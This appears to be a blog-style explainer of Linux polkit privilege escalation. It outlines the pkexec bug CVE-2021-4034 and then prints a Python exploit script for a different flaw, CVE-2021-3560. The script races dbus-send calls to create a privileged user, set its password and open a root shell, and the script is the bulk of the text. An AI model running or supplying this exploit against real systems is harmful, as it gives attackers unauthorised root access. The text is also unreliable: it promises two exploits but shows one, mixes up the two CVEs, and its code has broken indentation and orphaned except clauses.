Polkit or PolicyKit controls system-wide privileges and provides a way for non-privileged users to communicate with privileged ones. pkexec allows polkit to execute commands with escalated privileges, which is where a memory corruption bug dating back to 2009, was found in 2022.
The CVE-2021-4034 bug works on most Linux distributions that are not patched.
pkexec’s main() function processes command-line arguments, which searches for the program to be executed. If the path is not absolute, it checks directories of the PATH environment variable, which creates a pointer to the string and is written out-of-bounds if the name exists to envp[0]; This means that out-of-bounds write allows us to create an insecure environment variable into pkexec's environment, which is normally removed from SUID programs before main() is called:
main (int argc, char *argv[])
for (n = 1; n < (guint) argc; n++)
path = g_strdup (argv[n]);
if (path[0] != '/')
s = g_find_program_in_path (path);
argv[n] = path = s;
Below are two primary exploits that are known to work well:
import os
import sys
import time
import subprocess
import random
import pwd
print ("**************")
print("Exploit: Privilege escalation with polkit - CVE-2021-3560")
print("Exploit code written by Ahmad Almorabea @almorabea")
print("Original exploit author: Kevin Backhouse ")
print("For more details check this out: https://github.blog/2021-06-10-privilege-escalation-polkit-root-on-linux-with-bug/")
print ("**************")
print("[+] Starting the Exploit ")
check = True
counter = 0
while check:
counter = counter +1
process = subprocess.Popen(['dbus-send','--system','--dest=org.freedesktop.Accounts','--type=method_call','--print-reply','/org/freedesktop/Accounts','org.freedesktop.Accounts.CreateUser','string:ahmed','string:"Ahmad Almorabea','int32:1'])
#print('1 - Running in process', process.pid)
Random = random.uniform(0.006,0.009)
except subprocess.TimeoutExpired:
#print('Timed out - killing', process.pid)
user = subprocess.run(['id', 'ahmed'], stdout=subprocess.PIPE).stdout.decode('utf-8')
if user.find("uid") != -1:
print("[+] User Created with the name of ahmed")
print("[+] Timed out at: "+str(Random))
check =False
if counter > 2000:
print("[-] Couldn't add the user, try again it may work")
for i in range(200):
uid = "/org/freedesktop/Accounts/User"+str(pwd.getpwnam('ahmed').pw_uid)
#In case you need to put a password un-comment the code below and put your password after string:yourpassword'
password = "string:"
#res = subprocess.run(['openssl', 'passwd','-5',password], stdout=subprocess.PIPE).stdout.decode('utf-8')
#password = f"string:{res.rstrip()}"
process = subprocess.Popen(['dbus-send','--system','--dest=org.freedesktop.Accounts','--type=method_call','--print-reply',uid,'org.freedesktop.Accounts.User.SetPassword',password,'string:GoldenEye'])
#print('1 - Running in process', process.pid)
Random = random.uniform(0.006,0.009)
except subprocess.TimeoutExpired:
#print('Timed out - killing', process.pid)
print("[+] Timed out at: " + str(Random))
print("[+] Exploit Completed, Your new user is 'Ahmed' just log into it like, 'su ahmed', and then 'sudo su' to root ")
p = subprocess.call("(su ahmed -c 'sudo su')", shell=True)